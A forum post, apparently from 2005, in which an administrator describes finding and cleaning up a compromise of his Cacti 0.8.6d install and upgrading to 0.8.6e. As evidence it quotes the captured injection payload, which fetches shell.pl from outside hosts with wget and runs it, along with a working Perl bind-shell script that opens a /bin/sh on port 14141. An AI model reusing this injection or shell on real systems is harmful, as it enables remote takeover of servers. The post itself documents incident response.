I found the process by using top and typing 'P' to sort by CPU usage. Upon spotting the errant Perl processes I killed them with 'kill -9 process_id1 process_id2".
Alternate method by grepping ps is below.
Next by looking at "/tmp/shell.pl" I found that a socket was being created on 14141. In another shell.pl attempt, socket 4444 was being used.
Checking 'netstat -l | grep -e "14141\|4444"' indeed a socket was open and listening.
As I don't know how to close the sockets, I'm awaiting my data center to let me know how to do it.
In grepping my Apache logs, see below, I found "shell.pl" in them and traced it back to Cacti. Once I checked the forums here, I found that 0.8.6d had an injection flaw. I then went to my cacti directory and ran "cvs up -rRELEASE_0_8_6e" to update it.
After upgrading, diff your includes/config.php with includes/config.php.dist to find about any changes such as includes, variable initializers, and versions.
For me being a vi user, I used "vimdiff config.php config.php.dist" to quickly copy one line or so of code from one config to another.
Next, visit your Cacti install URL and upgrade. For me it was 0.8.6d to 0.8.6e.
Though not specifically stated, I went into my Cacti Console > System Utilities and cleared both Poller Cache and Log file.
Then go visit your normal Cacti graph URL to see if any errors show.
Lastly, to help make me aware of these undesired openings of Internet service sockets in the future. I downloaded and installed LSM (Linux Socket Monitor) from http://rfxnetworks.com/lsm.php. This essentially takes a baseline shot of current open sockets and default every 10 minutes reports via email if there's been a change.
Good luck and I hope this helps others.
Michael
http://cannonbose.com/cacti/graph_view. ... on=preview
Code: Select all
Processes - "ps -aux | grep shell"
105:nobody 11101 0.0 0.0 2172 952 ? S Jun23 0:00 sh -c /usr/local/bin/rrdtool graph - --imgformat=PNG --start=?cd /tmp;wget http://albythebest.altervista.org/shell.pl;chmod 777 shell.pl;perl shell.pl? --end=-300 --title="Charley - CPU Usage" --rigid --base=1000 --height=120 --width=500 --alt-auto
120:nobody 16433 0.0 0.0 2172 968 ? S 03:20 0:00 sh -c /usr/local/bin/rrdtool graph - --imgformat=PNG --start=?cd /tmp;wget http://219.238.232.208/pub/I386/shell.pl;chmod 777 shell.pl;perl shell.pl? --end=-300 --title="Charley - CPU Usage" --rigid --base=1000 --height=120 --width=500 --alt-autosc
root@delta:/usr/local/cacti/include # netstat -l | grep -e "14141\|4444"
warning, got duplicate tcp line.
warning, got duplicate tcp line.
46:tcp 0 0 *:14141 *:* LISTEN
Apache Log
root@delta:/usr/local/apache/logs # grep -rn "shell.pl" access_log
59489:200.222.106.252 - - [23/Jun/2005:09:58:59 -0500] "GET /cacti/graph_image.php?local_graph_id=50&graph_start=%0acd%20/tmp;wget%20http://albythebest.altervista.org/shell.pl;chmod%20777%20shell.pl;perl%20shell.pl%0a HTTP/1.1" 200 128
Code: Select all
#!/usr/bin/perl
use Socket;
$port=14141;
$proto=getprotobyname('tcp');
$cmd="lpd";
$system='/bin/sh';
$0=$cmd;
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
open(STDIN, ">&CLIENT");
open(STDOUT, ">&CLIENT");
open(STDERR, ">&CLIENT");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
}
